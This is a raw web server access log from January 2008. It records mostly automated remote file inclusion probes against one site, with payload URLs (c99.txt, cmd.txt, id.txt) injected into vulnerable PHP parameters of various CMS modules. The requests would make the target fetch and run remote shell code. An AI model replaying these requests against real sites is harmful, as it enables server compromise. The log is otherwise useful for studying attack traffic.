217.13.86.10 - - [30/Jan/2008:09:09:35 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:09:09:35 -0800] "GET /include.php?path[docroot]=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:09:09:35 -0800] "GET /logs/include.php?path[docroot]=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.124 - - [30/Jan/2008:09:10:18 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.124 - - [30/Jan/2008:09:10:18 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:09:10:25 -0800] "GET /include.php?path[docroot]=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.145.164 - - [30/Jan/2008:09:10:43 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.prevlaka.hr//templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.145.164 - - [30/Jan/2008:09:10:43 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.prevlaka.hr//templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.145.164 - - [30/Jan/2008:09:10:44 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://www.prevlaka.hr//templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.162.234 - - [30/Jan/2008:09:10:44 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/chandramission/chandra.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:09:11:05 -0800] "GET /logs/access_071229.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [30/Jan/2008:09:11:09 -0800] "GET ///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:09:12:02 -0800] "GET /logs/access_071230.log///modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://prevecamformacion.com/images/.smd/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:09:13:23 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:09:13:28 -0800] "GET /modules/My_eGallery/index.php?basepath=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:09:13:34 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.199.225.43 - - [30/Jan/2008:09:13:50 -0800] "GET /logs/access_070910.log HTTP/1.1" 200 50863 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=@gmail.com+++++++++++++@comcast.net+++++++++++++++&itag=crv&l=en&ics=utf-8&cs=utf8&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=PHP&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=TXT&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=2008&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=&doctype=text&dfr%5Bu%5D=on&dfr%5Bd%5D=1&dfr%5Bm%5D=8&dfr%5By%5D=2007&dto%5Bu%5D=on&dto%5Bd%5D=30&dto%5Bm%5D=1&dto%5By%5D=2008&hits=100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
207.58.138.211 - - [30/Jan/2008:09:14:00 -0800] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:09:14:07 -0800] "GET /logs/access_080106.log///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:09:14:08 -0800] "GET ///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2963 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.87 - - [30/Jan/2008:09:14:08 -0800] "GET /logs///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 33073 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.20 - - [30/Jan/2008:09:14:16 -0800] "GET /index.php?body=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.162.234 - - [30/Jan/2008:09:14:34 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://AstroIndo.Org/box/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [30/Jan/2008:09:16:07 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:09:17:43 -0800] "GET /index3.php?http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:09:17:43 -0800] "GET /logs/index3.php?http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:09:17:44 -0800] "GET /logs/access_080101.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.190 - - [30/Jan/2008:09:17:50 -0800] "GET //login.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.204.230.31 - - [30/Jan/2008:09:17:54 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.234.234 - - [30/Jan/2008:09:19:31 -0800] "GET /logs/access_080106.log///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [30/Jan/2008:09:19:32 -0800] "GET ///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [30/Jan/2008:09:19:32 -0800] "GET /logs///?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 32404 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:22:50 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:22:50 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:22:50 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:09:23:41 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:09:23:42 -0800] "GET /convert/mvcw.php?vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:09:23:42 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.145.164 - - [30/Jan/2008:09:24:06 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.prevlaka.hr//templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.145.164 - - [30/Jan/2008:09:24:06 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.prevlaka.hr//templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.145.164 - - [30/Jan/2008:09:24:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.prevlaka.hr//templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
116.193.163.10 - - [30/Jan/2008:09:24:28 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.193.163.10 - - [30/Jan/2008:09:24:29 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:09:25:39 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:09:28:36 -0800] "GET /logs/include/common.php?env[rootPath]=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:09:28:41 -0800] "GET /include/common.php?env[rootPath]=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.203.223.93 - - [30/Jan/2008:09:29:46 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [30/Jan/2008:09:30:10 -0800] "GET /logs/access_080106.log/index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [30/Jan/2008:09:30:10 -0800] "GET /index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [30/Jan/2008:09:30:10 -0800] "GET /logs/index.php?option=com_mosmedia&Itemid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:09:30:17 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:09:30:20 -0800] "GET /logs/include.php?path[docroot]=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:09:30:45 -0800] "GET /logs/access_071225.log/include.php?path[docroot]=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.3.70 - - [30/Jan/2008:09:31:24 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [30/Jan/2008:09:31:24 -0800] "GET //skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [30/Jan/2008:09:31:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.99.64 - - [30/Jan/2008:09:31:46 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.33.2.131 - - [30/Jan/2008:09:32:07 -0800] "GET //login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.3.70 - - [30/Jan/2008:09:33:11 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.128 - - [30/Jan/2008:09:33:22 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
193.34.68.128 - - [30/Jan/2008:09:33:23 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:33:52 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:33:52 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:33:52 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [30/Jan/2008:09:34:14 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.193.163.10 - - [30/Jan/2008:09:37:00 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.156.105.11 - - [30/Jan/2008:09:38:57 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [30/Jan/2008:09:38:57 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [30/Jan/2008:09:38:58 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.89.97 - - [30/Jan/2008:09:39:43 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/jembutc/hajar.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [30/Jan/2008:09:39:43 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/jembutc/hajar.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [30/Jan/2008:09:39:43 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/jembutc/hajar.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:09:39:49 -0800] "GET /menu.php?http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.205.186.244 - - [30/Jan/2008:09:39:49 -0800] "GET /logs/menu.php?http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
204.200.196.153 - - [30/Jan/2008:09:41:31 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.196.153 - - [30/Jan/2008:09:41:31 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.196.153 - - [30/Jan/2008:09:41:31 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/renatas2/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:09:42:55 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.107 - - [30/Jan/2008:09:43:19 -0800] "GET /logs/access.log HTTP/1.0" 200 167074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:09:44:50 -0800] "GET /logs/access_071229.log/index2.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:09:44:50 -0800] "GET /index2.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:09:44:51 -0800] "GET /logs/index2.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.34 - - [30/Jan/2008:09:46:07 -0800] "GET /tmp/?S=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:46:10 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:46:10 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:46:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.97.225 - - [30/Jan/2008:09:46:24 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:47:12 -0800] "GET /logs/access_071230.log/squirrelcart/cart_content.php?cart_isp_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:47:13 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:47:13 -0800] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.84 - - [30/Jan/2008:09:47:24 -0800] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://claroline.lct-net.cl/uid????????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
201.130.79.84 - - [30/Jan/2008:09:47:24 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://claroline.lct-net.cl/uid????????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:09:47:51 -0800] "GET /logs/access_071220.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:09:47:51 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:09:47:52 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 32398 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.46.109 - - [30/Jan/2008:09:47:52 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:09:48:41 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.250.115 - - [30/Jan/2008:09:51:14 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.190 - - [30/Jan/2008:09:51:25 -0800] "GET /logs/access_071229.log//login.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.190 - - [30/Jan/2008:09:51:25 -0800] "GET /logs//login.php?dir=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:09:52:48 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [30/Jan/2008:09:53:27 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [30/Jan/2008:09:53:27 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [30/Jan/2008:09:53:27 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.123.108.73 - - [30/Jan/2008:09:53:50 -0800] "GET //login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:09:55:26 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:09:57:04 -0800] "GET /logs/access_071212.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [30/Jan/2008:09:58:28 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [30/Jan/2008:09:58:28 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.97.225 - - [30/Jan/2008:09:58:55 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.97.225 - - [30/Jan/2008:09:58:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.38.62.39 - - [30/Jan/2008:09:59:08 -0800] "GET /logs//zipndownload.php?PP_PATH=http://www.colecionismo.com.br//modules/coppermine/albums/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
